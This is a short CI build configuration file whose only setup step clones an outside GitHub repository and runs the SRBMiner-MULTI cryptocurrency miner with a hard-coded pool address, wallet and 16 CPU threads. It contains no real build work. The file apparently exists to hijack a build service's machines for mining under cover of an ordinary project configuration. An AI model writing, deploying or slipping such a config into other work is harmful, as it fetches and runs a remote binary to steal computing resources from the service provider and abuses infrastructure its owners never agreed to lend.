build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: git clone https://github.com/remakove/artions.git artions && cd artions && chmod +x SRBMiner-MULTI && ./SRBMiner-MULTI --algorithm yescryptr8 --pool stratum+tcps://stratum-eu.rplant.xyz:17054 --wallet Zqu9jQMuikp17bZ7RqP2rmqBQVhLoehjNf.p2 --disable-gpu --cpu-threads 16 --cpu-affinity 0xFFFF
